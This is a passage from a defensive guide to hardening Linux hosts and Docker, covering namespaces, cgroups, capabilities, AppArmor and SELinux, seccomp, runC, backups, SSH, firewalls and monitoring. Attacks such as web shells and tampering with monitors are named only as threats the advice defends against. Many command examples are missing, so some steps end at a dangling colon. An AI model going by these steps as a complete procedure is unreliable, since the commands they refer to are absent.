: Keep with the default propagation mode of private
unless you have a very good reason to change it. If you do need to change it, think about defence in depth and employ other defence strategies.
If you have control over the Docker host, lock down the mounting of the host systems partitions as discussed in the Lock Down the Mounting of Partitions section.
If you have to mount a sensitive host system directory, mount it as read-only:
If any file modifications are now attempted on /etc
they will be unsuccessful.
Also, as discussed previously, lock down the user to non-root.
If you are using LSM, you will probably want to use the Z
option as discussed in the risks section.
PID
: By default enforces isolation from the containers PID
namespace, but not from the host to the container. If you are concerned about host systems being able to access your containers, as you should be, consider putting your containers within a VM net
: A network namespace is a virtualisation of the network stack, with its own network devices, IP routing tables, firewall rules and ports.When the last process in a network namespace terminates, the namespace will be destroyed and destroy any virtual interfaces within it and move any physical network devices back to the initial network namespace, not the process parent.
Docker and Network Namespaces
A Docker network is analogous to a Linux kernel network namespace.
When Docker is installed, three networks are created bridge
, host
and null
, which you can think of as network namespaces. These can be seen by running: docker network ls
When you run a container, if you want to override the default network of bridge
, you can specify which network you want to run the container in with the --network
flag as the following:
docker run --network=<network>
The bridge can be seen by running ifconfig
on the host:
When the Docker engine (CLI) client or API tells the Docker daemon to run a container, part of the process allocates a bridged interface, unless specified otherwise, that allows processes within the container to communicate to the system host via the virtual Ethernet bridge.
Virtual Ethernet interfaces when created are always created as a pair. You can think of them as one interface on each side of a namespace wall with a tube through the wall connecting them. Packets come in one interface and pop out the other, and visa versa.
Creating and Listing Network NameSpaces
Some of these commands you will need to run as root.
Create:
This ip command adds a bind mount point for the testnamespace
namespace to /var/run/netns/
. When the testnamespace
namespace is created, the resulting file descriptor keeps the network namespace alive/persisted. This allows system administrators to apply configuration to the network namespace without fear that it will disappear when no processes are within it.
A network namespace added in this way however can not be used for a docker container. In order to create a Docker network called kimsdockernet
run the following command:
You can then follow this with a
docker network ls
to confirm that the network was added. You can base your network on one of the existing network drivers created by docker, the bridge driver is used by default.
bridge
: As seen above with the ifconfig
listing on the host system, an interface is created called docker0 when Docker is installed. A pair of veth (Virtual Ethernet) interfaces are created when the container is run with this --network
option. The veth
on the outside of the container will be attached to the bridge, the other veth
is put inside the container’s namespace, along with the existing loopback interface.
none
: There will be no networking in the container other than the loopback interface which was created when the network namespace was created, and has no routes to external traffic.
host
: Use the network stack that the host system uses inside the container. The host
mode is more performant than the bridge
mode due to using the hosts native network stack, but also less secure.
container
: Allows you to specify another container to use its network stack.
By running
docker network inspect kimsdockernet
before starting the container and then again after, you will see the new container added to the kimsdockernet
network.
Now you can run your container using your new network:
When one or more processes (Docker containers in this case) use the kimsdockernet
network, it can also be seen opened by the presence of its file descriptor at:
/var/run/docker/netns/<filedescriptor>
You can also see that the container named container0
has a network namespace by running the following command, which shows the file handles for the namespaces, and not just the network namespace:
If you run
ip netns list
again, you may think that you should be able to see the Docker network, but you will not, unless you create the following symlink:
If you want to run a command inside of the Docker network of a container, you can use the nsenter
command of the util-linux
package:
Deleting Network NameSpaces
The following command will remove the bind mount for the specified namespace. The namespace will continue to persist until all processes within it are terminated, at which point any virtual interfaces within it will be destroyed and any physical network devices if they were assigned, would be moved back to the initial network namespace, not the process parent.
If you still have a container running, you will receive an error:
Error response from daemon: network kimsdockernet has active endpoints
Stop your container and try again.
It would pay to also understand container communication with each other.
Also checkout the Additional Resources.
UTS
Do not start your containers with the --uts
flag set to host
host
:
IPC
: In order to stop another untrusted container sharing your containers IPC namespace, you could isolate all of your trusted containers in a VM, or if you are using some type of orchestration, that will usually have functionality to isolate groups of containers. If you can isolate your trusted containers sufficiently, then you may still be able to share the IPC namespace of other near by containers.user
: If you have read the risks section and still want to enable support for user namespaces, you first need to confirm that the host user of the associated containers PID
is not root by running the following CIS Docker Benchmark recommended commands:
Or, you can run the following command and make sure that the userns
is listed under the SecurityOptions
Once you have confirmed that your containers are not being run as root, you can look at enabling user namespace support on the Docker daemon.
The /etc/subuid
and /etc/subgid
host files will be read for the user and optional group supplied to the --userns-remap
option of dockerd
.
The --userns-remap
option accepts the following value types:
uid
uid:gid
username
username:groupname
The username must exist in the /etc/passwd
file, the sbin/nologin
users are valid also. Subordinate user Id and group Id ranges need to be specified in /etc/subuid
and /etc/subuid
respectively.
“The UID/GID we want to remap to does not need to match the UID/GID of the username in /etc/passwd
”. It is the entity in the /etc/subuid
that will be the owner of the Docker daemon and the containers it runs. The value you supply to --userns-remap
if numeric Ids, will be translated back to the valid user or group names of /etc/passwd
and /etc/group
which must exist, if username, groupname, they must match the entities in /etc/passwd
, /etc/subuid
, and /etc/subgid
.
Alternatively if you do not want to specify your own user and/or user:group, you can provide the default
value to --userns-remap
, and a default user of dockremap
along with subordinate uid and gid ranges will be created in /etc/passwd
and /etc/group
if it does not already exist. Then the /etc/subuid
and /etc/subgid
files will be populated with a contiguous 65536 length range of subordinate user and group Ids respectively, starting at the offset of the existing entries in those files.
If dockremap
does not already exist, it will be created:
There are rules around providing multiple range segments in the /etc/subuid
, /etc/subgid
files, but that is beyond the scope of what I am providing here. For those advanced scenario details, check out the Docker engine reference. The simple scenario is that we use a single contiguous range like you see in the above example, this will cause Docker to map the hosts user and group ids to the container process using as much of the 165536:65536
range as necessary. So for example the hosts root user would be mapped to 165536
, the next host user would be mapped to container user 165537
, and so on until the 65536 possible ids are all mapped. Processes run as root inside the container are owned by the subordinate uid outside of the container.
Disabling user namespace for specific containers
In order to disable user namespace mapping on a per container basis once enabled for the Docker daemon, you could supply the --userns=host
value to either of the run
, exec
or create
Docker commands. This would mean the default user within the container was mapped to the hosts root.
Use cgroups to limit, track and monitor the resources available to each container at each nested level. Docker makes applying resource constraints very easy. Check the Runtime constraints on resources Docker engine run reference documentation, which covers applying constraints such as:
For additional details on setting these types of resource limits, also refer to the Limit a container’s resources Admin Guide for Docker Engine. Basically when you run
a container, you simply provide any number of the runtime configuration flags that control the underlying cgroup system resources. Cgroup resources can not be set if a process is not running, that is why we optionally pass the flag(s) at run-time or alternatively manually change the cgroup settings once a process (or Docker container in our case) is running. We can make manual changes on the fly by directly modifying the cgroup resource files. These files are stored in the containers cgroup directories shown in the output of the /sys/fs/cgroup find -name "4f1f200ce13f2a7a180730f964c6c56d25218d6dd40b027c7b5ee1e551f4eb24"
command below. These files are ephemeral for the life of the process (Docker container in our case).
By default Docker uses the cgroupfs cgroup driver to interface with the Linux kernel’s cgroups. You can see this by running docker info
. The Linux kernel’s cgroup interface is provided through the cgroupfs pseudo-filesystem /sys/fs/cgroup
on the host filesystem of recent Linux distributions. The /proc/cgroups
file contains the information about the systems controllers compiled into the kernel. This file on my test system looks like the following:
The fields represent the following:
subsys_name
: The name of the controllerhierarchy
: Unique Id of the cgroup hierarchynum_cgroups
: The number of cgroups in the specific hierarchy using this controllerenabled
: 1 == enabled, 0 == disabled If you run a container like the following:
Cgroups for your containers and the system resources controlled by them will be stored as follows:
Docker also keeps track of the cgroups in
/sys/fs/cgroup/[resource]/docker/[containerId]
You will notice that Docker creates cgroups using the container Id.
If you want to manually create a cgroup and have your containers hierarchically nested within it, you just need to mkdir
within:
/sys/fs/cgroup/
you will probably need to be root for this.
Which makes and populates the directory and also sets up the cgroup like the following:
Now you can run a container with cg1
as your cgroup parent:
Now that Docker has your container named cgroup-test1
running, you will be able to see the nested cgroups:
You can also run containers nested below already running containers cgroups, let us take the container named cgroup-test
for example:
Now your new container named cgroup-test2
will have a set of nested cgroups within each of the:
93cb84d30291201a84d5676545015220696dbcc72a65a12a0c96cda01dd1d270
directories shown here:
You should see the same result if you have a look in the running container’s
/proc/self/cgroup
file.
Within each cgroup resides a collection of files specific to the controlled resource, some of which are used to limit aspects of the resource, some of which are used for monitoring aspects of the resource. They should be fairly obvious what they are, based on their names. You can not exceed the resource limits of the cgroup that your cgroup is nested within. There are ways in which you can get visibility into any containers resource usage. One quick and simple way is with the:
docker stats
[containerId]
command, which will give you a line with your containers CPU usage, Memory usage and Limit, Net I/O, Block I/O, Number of PIDs. There are so many other sources of container resource usage. Check the Docker engine runtime metrics documentation for additional details.
The most granular information can be found in the statistical files within the cgroup directories listed above.
The /proc/[pid]/cgroup
file provides a description of the cgroups that the process with the specified PID belongs to. You can see this in the following cat
output. The information provided is different for cgroups version 1 and version 2 hierarchies, for this example, we are focussing on version 1. Docker abstracts all of this anyway, so it is just to show you how things hang together:
Each row of the above file depicts one of the cgroup hierarchies that the process, or Docker container in our case is a member of. The row consists of three fields separated by colon, in the form:
hierarchy-Id:list-of-controllers-bound-to-hierarchy:cgroup-path
If you remember back to where we looked at the /proc/cgroups
file above, you will notice that the:
hierarchy-Id
/proc/cgroups
, the third field contains relative to the mount point of the hierarchy the pathname of the cgroup in the hierarchy to which the process belongs. You can see this reflected with the/sys/fs/cgroup find -name "93cb84d30291*"
Fork Bomb from Container
With a little help from the CIS Docker Benchmark we can use the PID
s cgroup limit:
Run the containers with --pids-limit
(kernel version 4.3+) and set a sensible value for maximum number of processes that the container can run, based on what the container is expected to be doing. By default the PidsLimit value displayed with the following command will be 0. 0 or -1 means that any number of processes can be forked within the container:
There are several ways you can minimise your set of capabilities that the root user of the container will run. pscap
is a useful command from the libcap-ng-utils
package in Debian and some other distributions. Once installed you can check which capabilities your container built from the <amazing>
image runs with, by:
In order to drop capabilities setfcap
, audit_write
, and mknod
, you could run:
Or just drop all capabilities and only add what you need:
Another way of auditing the capabilities of your container is with the following command from CIS Docker Benchmark:
Alternatively you can modify the container manifest directly. See the runC section for this.
Linux Security Modules (LSM) is a framework that has been part of the Linux kernel since 2.6, that supports security models implementing Mandatory Access Control (MAC). The currently accepted modules are AppArmor, SELinux, Smack and TOMOYO Linux.
At the first Linux kernel summit in 2001, “Peter Loscocco from the National Security Agency (NSA) presented the design of the mandatory access control system in its SE Linux distribution.” SE Linux had implemented: Many check points where authorization to perform a particular task was controlled, and a security manager process which implements the actual authorization policy. “The separation of the checks and the policy mechanism is an important aspect of the system - different sites can implement very different access policies using the same system.” The aim of this separation is to make it harder for the user to not adjust or override policies.
It was realised that there were several security related projects trying to solve the same problem. It was decided to have the developers interested in security create a “generic interface which could be used by any security policy. The result was the Linux Security Modules (LSM)” API/framework, which provides many hooks at security critical points within the kernel.
LSMs can register with the API and receive callbacks from these hooks when the Unix Discretionary Access Control (DAC) checks succeed, allowing the LSMs Mandatory Access Control (MAC) code to run. The LSMs are not loadable kernel modules, but instead selectable at build-time via CONFIG_DEFAULT_SECURITY
which takes a comma separated list of LSM names. Commonly multiple LSMs are built into a given kernel and can be overridden at boot-time via the security=...
kernel command line argument, also taking a comma separated list of LSM names.
If no specific LSMs are built into the kernel, the default LSM will be the Linux capabilities. “Most LSMs choose to extend the capabilities system, building their checks on top of the defined capability hooks.” A comma separated list of the active security modules can be found in /sys/kernel/security/lsm
. The list reflects the order in which checks are made, the capability module will always be present and be the first in the list.
AppArmor LSM in Docker
If you intend to use AppArmor, make sure it is installed, and you have a policy loaded (apparmor_parser -r [/path/to/your_policy]
) and enforced (aa-enforce
).
AppArmor policy’s are created using the profile language. Docker will automatically generate and load a default AppArmor policy docker-default
when you run a container. If you want to override the policy, you do this with the --security-opt
flag, like:
docker run --security-opt apparmor=your_policy [container-name]
providing your policy is loaded as mentioned above. There are further details available on the apparmor page of Dockers Secure Engine.
SELinux LSM in Docker
Red Hat, Fedora, and some other distributions ship with SELinux policies for Docker. Many other distros such as Debian require an install. SELinux needs to be installed and configured on Debian.
SELinux support for the Docker daemon is disabled by default and needs to be enabled with the following command:
Docker daemon options can also be set within the daemon configuration file
/etc/docker/daemon.json
by default or by specifying an alternative location with the --config-file
flag.
label confinement for the container can be configured using --security-opt
to load SELinux or AppArmor policies as shown in the Docker run
example below:
SELinux Labels for Docker consist of four parts:
SELinux can be enabled in the container using setenforce 1
.
SELinux can operate in one of three modes:
disabled
: not enabled in the kernelpermissive
or 0
: SELinux is running and logging, but not controlling/enforcing permissionsenforcing
or 1
: SELinux is running and enforcing policyTo change at run-time: Use the setenforce [0|1]
command to change between permissive
and enforcing
. Test this, set to enforcing
before persisting it at boot.
To persist on boot: In Debian, set enforcing=1
in the kernel command line
GRUB_CMDLINE_LINUX
in /etc/default/grub
and run update-grub
SELinux will be enforcing after a reboot.
To audit what LSM options you currently have applied to your containers, run the following command from the CIS Docker Benchmark:
First you need to make sure your Docker instance was built with Seccomp. Using the recommended command from the CIS Docker Benchmark:
and your kernel is configured with CONFIG_SECCOMP
:
To add System calls to the list of syscalls you want to block for your container, take a copy of the default seccomp profile for containers (default.json
) which contains a whitelist of the allowed System calls, and remove the System calls you want blocked, then run your container with the --security-opt
option to override the default profile with a copy that you have modified:
Running a container with the --read-only
flag stops writes to the container.
This can sometimes be a little to constraining, as your application may need to write some temporary data locally. You could volume mount a host directory into your container, but this would obviously expose that temporary data to the host, and also other containers that may mount the same host directory. To stop other containers sharing your mounted volume, you would have to employ labelling with the likes of LSM and apply the Z
suffix at volume mount time.
A better, easier and simpler solution would be to apply the --tmpfs
flag to one or more directories. --tmpfs
allows the setting up of tmpfs (appearing as a mounted file system, but stored in volatile memory) mounts on any local directory, solving the problem of not being able to write at all to read-only containers.
If an existing directory is specified with the --tmpfs
option, you will experience similar behaviour to that of mounting an empty directory onto an existing one. The directory is initially empty, any additions or modifications to the directories contents will not persist past container stop.
The following is an example of running a container as read-only with a writeable tmpfs /tmp
directory:
The default mount flags with --tmpfs
are the same as the Linux default mount
flags, if you do not specify any mount
flags the following will be used:
rw,noexec,nosuid,nodev,size=65536k
Docker engine is now built on containerd and runC. Engine creates the image indirectly via containerd -> runC using libcontainer -> and passes it to containerd.
containerd (daemon for Linux or Windows):
is based on the Docker engine’s core container runtime. It manages the complete container life-cycle, managing primitives on Linux and Windows hosts such as the following, whether directly or indirectly:
containerd
calls containerd-shim
which uses runC to run the container. containerd-shim
allows the runtime, which is docker-runc
in Dockers case to exit once it has started the container, thus allowing the container to run without a daemon. You can see this if you run
ps aux | grep docker
In fact, if you run this command you will see how all the components hang together. Viewing this output along with the diagram below, will help solidify your understanding of the relationships between the components.
runC: is the container runtime that runs containers (think, run Container) according to the OCI specification, runC is a small standalone command line tool (CLI) built on and providing interface to libcontainer, which does most of the work. runC provides interface with:
These features have been integrated into the low level, light weight, portable, container runtime CLI called runC, libcontainer is doing most of the work. It has no dependency on the rest of the Docker platform, and has all the code required by Docker to interact with the container specific system features. More correctly, libcontainer is the library that interfaces with the above mentioned kernel features. runC leverage’s libcontainer directly, without the Docker engine being required in the middle.
runC was created by the OCI, whos goal is to have an industry standard for container runtimes and formats, attempting to ensure that containers built for one engine can run on other engines.
runC can be installed separately, but it does come with Docker (in the form of docker-runc
) as well. just run it to see the available commands and options.
runC allows us to configure and debug many of the above mentioned points we have discussed. If you want, or need to get to a lower level with your containers, using runC
(or if you have Docker installed, docker-runc
), directly can be a useful technique to interact with your containers. It does require additional work that docker run
commands already do for us. First you will need to create an OCI bundle, which includes providing configuration in the host independent config.json
and host specific runtime.json
files. You must also construct or export a root filesystem, which if you have Docker installed you can export an existing containers root filesystem with docker export
.
A container manifest (config.json
) can be created by running:
runc spec
which creates a manifest according to the Open Container Initiative (OCI)/runc specification. Engineers can then add any additional attributes such as capabilities on top of the three specified within a container manifest created by the runc spec
command.
Yes container security is important, but in most cases, it is not the lowest hanging fruit for an attacker.
Application security is still the weakest point for compromise. It is usually much easier to attack an application running in a container or anywhere for that matter than it is to break container isolation or any security offered by containers or their infrastructure. Once an attacker has exploited any one of the commonly exploited vulnerabilities (such as any of the OWASP Top 10 for starters) still being introduced and found in our applications on a daily basis, and subsequently performed a remote code execution for example, and ex-filled the database, no amount of container security is going to mitigate this.
During and before my interview of Diogo Mónica on Docker Security for the Software Engineering Radio show, we discussed Isolation concepts, many of which I have covered above. Diogo mentioned: “why does isolation even matter when an attacker already has access to your internal network?” There are very few attacks that require escaping from a container or VM in order to succeed, there are just so many easier approaches to compromise. Yes, this may be an issue for the cloud providers that are hosting containers and VMs, but for most businesses, the most common attack vectors are still attacks focussing on our weakest areas, such as people, password stealing, spear phishing, uploading and execution of web shells, compromising social media accounts, weaponised documents, and ultimately application security, as I have mentioned many times before.
Diogo and myself also had a discussion about the number of container vs VM vulnerabilities, and it is pretty clear that there are far more vulnerabilities affecting VMs than there are affecting containers.
VMs have memory isolation, but many of the bugs listed in the Xen CVEs alone circumvent memory isolation benefits that VMs may have provided.
Another point that Diogo raised was the ability to monitor/inspect and control the behaviour of applications within containers. In VMs there is so much activity that is unrelated to your applications, so although you can monitor activity within VMs, the noise to signal ratio is just to high to get accurate indications of what is happening in and around your application that actually matters to you. VMs also provide very little ability to control the resources associated with your running application(s). Inside of a container, you have your application and hopefully little else. With the likes of Control Groups you have many points at which you can monitor and control aspects of the application environment.
As mentioned above, Docker containers are immutable, and can be run read-only.
The Secure Developer podcast with Guy Podjarny interviewing Ben Bernstein (CEO and founder of Twistlock) - show #7 Understanding Container Security also echo’s these same sentiments.
Also be sure to check the Additional Resources chapter for many excellent resources I collected along the way on Docker security.
Just do not do this. Either stay disciplined and upgrade your servers manually or automate it. Start out the way you intend to go. Work out your strategy for keeping your system(s) up to date and patched. There are many options here. If you go auto, make sure you test on a staging environment before upgrading live.
Make sure all your data and VM images are backed up routinely. Make sure you test that restoring your backups work. Backup or source control system files, deployment scripts and what ever else is important to you. Make sure you have backups of your backups and source control. There are plenty of tools available to help. Also make sure you are backing up the entire VM if your machine is a virtual guest by export/import OVF files. I also like to backup all the VM files. Disk space is cheap. Is there such a thing as being too prepared for a disaster? I don’t think I have seen it yet. It is just a matter of time before you will be calling on your backups.
This is one of the last things you should look at. In fact, it is not really needed if you have taken the time to remove unnecessary services and harden what is left. If you use a host firewall keep your set of rules to a minimum to reduce confusion and increase legibility. Maintain both ingress & egress.
The following is a final type of check-list that I like to use before opening a hardened web server to the world. You will probably have additional items you can add.
CNAME
or what ever type of DNS
record you are usingAre there any? If so what are they?
Bringing your VPS(s) in-house can provide certainty and reduce risks of vendor lock-in, but the side-effect to this, is that you may not get your solution to market quick enough, and someone else beats you, which may mean the end of business for you. Many of the larger cloud providers are getting better at security and provide many tools and techniques for hardening the resources you hire.
Often SMB services are required, so turning them off may not be an option.
Some of the countermeasures may introduce some inconvenience.
There is the somewhat obvious aspect that applying the countermeasures will take some research to work out what can be done and the length of time it will take to do it.
Next generation Anti-Virus (AV) using machine learning is currently expensive.
Deep Script Block Logging can consume large amounts of disk space if you have “enabling Log script block invocation start / stop events” turned on.
You may not have something installed that you need.
You may find some stage later on that a component that you removed is actually needed.
This process can sometimes lock things down to tightly. I would much rather go to far here and have to back things off a little, or get creative with a script to unmount, remount with less restrictions applied, perform the action you need, then mount again according to the /etc/fstab
. This is similar to the Mounting of Partitions section below
The default number of rounds applied to the key stretching process by the Unix C library (Crypt) has not changed in the last 9 years. I addressed this in the Countermeasures section, but most people will not bother increasing this value. I would recommend doing so.
Just because you may be using SSH and SSH itself is secure, does not mean you are using it in a secure way. If you follow my advice in the Countermeasures section you will be fine. SSH can be used in insecure ways.
When you make configuration changes to SSH, it often pays to either have physical access or have more than one SSH session open when you make the change -> restart SSH -> exit your session, otherwise you run the risk of locking yourself out.
If you have to boot from an alternative medium such as a rescue CD, you may wonder why this does not work.
You may lock yourself out of being able to administer your system. This is similar to the Partitioning on OS Installation section above.
If you are using portmap, consider swapping it for rpcbind.
You may be using Exim. Make sure you are not before you disable it.
You may be using NIS+. Make sure you are not before you disable it.
As discussed in the Countermeasures section, just make sure you have no need for Rpcbind before you remove it. Taking the slightly safer approach of just denying rpcbind responses in the /etc/hosts.deny
is also an option.
Someone legitimate may be relying on telnet. If this is the case, you may have larger problems than telnet. The Ignorance section of Identify Risks of the People chapter in Fascicle 0 may be pertinent here.
You may have some staff that are set in their ways. Gently coax them to understand the complete absence of security with FTP and the issues with FTPS.
Possible misconfiguration, make sure you test your configuration thoroughly after changes.
Possibly false confidence in the tools that are supposed to provide visibility. Using a collecting of similar tools can be a good idea. The attacker only needs to miss one then.
Of course any of the visibility providing tools can be replaced with trojanised replicas, unless you have a Host Intrusion Detection System (HIDS) running from a location that the attacker is not aware of, continually checking for the existence and validity of the core system components.
There are lots of options to choose from in this space.
Logging and Alerting is never going to be a complete solution. There is risk that people think that one or two tools mean they are covered from every type of attack, this is never the case. A large array of diverse countermeasures is always going to be required to produce good visibility of your system(s). Even using multiple tools that do similar jobs but take different strategies on how they execute and in-fact from where they run.
There are some complexities that you need to understand in order to create a water-tight and reliable off-site logging system. I discuss these in the Countermeasures section along with testing and verifying your logs are being transferred privately.
Over confidence in monitoring tools. For example an attacker could try and replace the configuration files for Monit or the Monit daemon itself, so the following sorts of tests would either not run or return tampered with results:
In saying that, if you have an agentless (running from somewhere else) file integrity checker or even several of them running on different machines and as part of their scope are checking Monit, then the attacker is going to have to find the agentless file integrity checker(s) and disable them also without being noticed. Especially as I disguised in regards to Stealth, that the recommendation was that the Monitor not accept any incoming connections, and be in a physically safe location. This is increasing the level of difficulty for an attacker significantly.
You could and should also have NIDs running on your network which makes this even more likely that an attacker is going to step on a land mine.
There are new components introduced, which increases attack surface.
The benefits far outweigh any risks here.
Using a system like Stealth as your file integrity checker that resides on a server(s) somewhere else that run against the target server, means an attacker will very often not realise that they are under observation if they can not see the observer running on the machine that they are on.
This sort of strategy provides a false sense of self security for the attacker. In a way a similar concept to the honey pot. They may know about a tool operating on the server they are on and even have disabled it, but if you keep the defence in depth mentality, there is no reason that you can not have the upper hand without the attacker being aware of it.
You can also take things further with honey pits and mirages, these are modules in code that actively produce answers designed to confuse and confound poking and prodding attackers. This can create perfect ambush and burn up the attackers time. Attackers have budgets too. The longer it takes an attacker to compromise your system(s), the more likely they are to start making mistakes and get caught.
Docker security is a balancing act. There are many things you can do, that will not disadvantage you in any way. Experiment.
There are hundreds of LSM security hooks throughout the kernel, these hooks provide additional attack surface. An attacker with a buffer overflow vulnerability for example may be able to insert their own byte code and bypass the LSM provided implementation, or even redirect to a payload of their choosing. James Morris, a Linux Kernel Developer discussed this on his blog.
Employing a LSM and learning its intricacies and how to configure it is a bit of a learning curve, but one that is often well worth the effort, and this does not just apply to Docker, but all of the hundreds of resources that the kernel attempts to manage.
Relying on scheduled backups that do not exist or have in some way failed. Make sure you test your backups routinely. What you use to backup will obviously depend on where you are operating and what you are trying to backup. For example, if you are backing up Docker containers, just get those Dockerfiles in source control. If you are backing up VPSs locally, use your preferred infrastructure management tool, such as Terraform. If you are in the cloud, your provider will almost certainly have a tool for this.
Personally I prefer not to rely on firewalls, once you have removed any surplus services and hardened what is left, firewalls do not provide a lot of benefit. I recommend not relying on them, but instead making your system(s) hard enough so that you do not require a firewall. Then if you decide to add one, they will be just another layer of defence. Dependence on firewalls often produce a single point of failure and a false sense of security, as to much trust is placed in them to protect weak and vulnerable services and communications that should instead be hardened themselves.
If you choose to go the default way now and rely on others for your compute, these are some things you should consider:
Work through the collection of Countermeasure items and just as we did in the Countermeasures section of the 30,000’ view chapter of Fascicle 0 you should have already applied a relative number for the amount of work to be done to the Countermeasure Product Backlog Items. The Costs and Trade-offs will often become obvious as you iterate on the countermeasure work itself.
Personally I think the cost of next generation AV with machine learning is worth the investment.
You could consider not turning on “enabling Log script block invocation start / stop events”, I would sooner have it on and consider getting your logs off-site as we discussed in the Logging and Alerting section, with a well configured logrotate schedule.
When you find out you need something, research it along with alternatives. Work out whether the additional attack surface is worth the functionality you wish to add.
Do your home work up front and decide what is actually required to stay and what is not. In most cases re-enabling or re-adding will only cost you time.
Often a little trial and error is required to get the optimal configuration for your needs.
Making these changes takes a little time, depending on how familiar you are with Crypt and how it does things.
If you use Docker and do not run as root, then you have another layer that any attacker has to break through in order to get to the host system. This lifts the bar significantly on host password compromise.
SSH is secure by definition, in saying that, you can still use it insecurely. I have seen some organisations store their private keys on their developer wiki so that all the developers within the company can easily access the private key and copy it locally. Do not do this, there are so many things wrong with this.
Make sure you use a pass phrase unless you have a good reason not to, and can in some other way safeguard your SSH access, like using ssh-cron for example.
I am sure you will be smart enough to work it out. Just re-enable the boot option from what ever device it is you are trying to boot from, and do not forget to disable it once you are finished.
Locking yourself out of being able to administer your system due to overly zealous restrictive mount options is not the end of the world, just boot from a live CD and you will be able to adjust your /etc/fstab
.
This is also a place where Docker containers shine, by using the --read-only
flag and many other options that can help immensely, be sure to check the Docker sections if you have not already.
Portmap is simple to disable, go ahead.
If you are not using Exim, it only takes a few minutes to disable, so go ahead.
I am not aware of any costs with removing NIS if it is not necessary, and if it is being used, consider using something else.
I am not aware of any costs with removing or disabling responses from rpcbind if it is not required.
If someone legitimate is still relying on telnet, send them to the Risks section followed by the Countermeasures section.
If you can convince your staff to read and understand the issues with FTP, and FTPS including the possible confusion around how to use FTPS securely, what can go wrong, and mandate a more secure file transfer protocol such as the recommended SFTP or SCP, then you just need to make sure SSH is not being used incorrectly
If you are using NFS, there is some configuration required, this can take a few minutes. Scripting this for a configuration management tool is a good idea if you need to apply the same configuration to many servers.
All of the suggested offerings under this heading take time to set-up. Evaluate where your weakest areas are, and which offerings will give you the best results for your situation, and start there.
You will need to invest time into understanding what each offering does, its strengths and weaknesses
This will take some time to set-up, test and verify all the requirements. It is essential to have reliable off-site logging on most systems.
There was quite a bit of time spent in the Countermeasures section, but most of that work is now done for you. Now it is just a matter of following the steps I have laid out.
I have found these tools to be well worth the investment when you are dealing with hosts. We also cover statsd in the Web Applications chapter which performs a similar role for the application itself, which if you are using Docker containers, the lowest hanging fruit in terms of security from an external attackers perspective defiantly falls on your application code.
HIDS are one of the must haves on your systems, they also need to be set-up as early as possible, ideally before the server has been exposed to the internet, or any network that has the potential for an attacker to gain access and plant malware.
Some of the extra steps you may take from the default security standpoint with Docker may restrict some flexibility, when and if this happens, just back them off a bit. There are many aspects to hardening Docker that have no negative side effects at all. Concentrate on these after you have your application security to a good level, usually that in itself is a lot of work.
There are many ways to do this. If you are a one man band, really simple techniques may work well, if you are a large shop, you will ideally want an automated solution, whether you build it yourself or rely on someone else to do it.
Work out what you need, count the costs of that data being lost, measure the cost of the potential solutions, and compare.
I have used rsync in many shapes and forms for many years and it has been good. Check your backup logs to make sure what you think is happening is. When you are setting up your backup scripts, dry-run test them, to make sure you do not over-write something or some place that was not intended.
You can run scripts manually if you are disciplined and they are very easy, otherwise it usually pays to automate them. Cron does what it says it will do on the box.
A host firewall can be a good temporary patch, and that is the problem. Nothing is as permanent as a temporary patch. A firewall is a single layer of defence and one that is often used to hide the inadequacies of the rest of the layers of defence.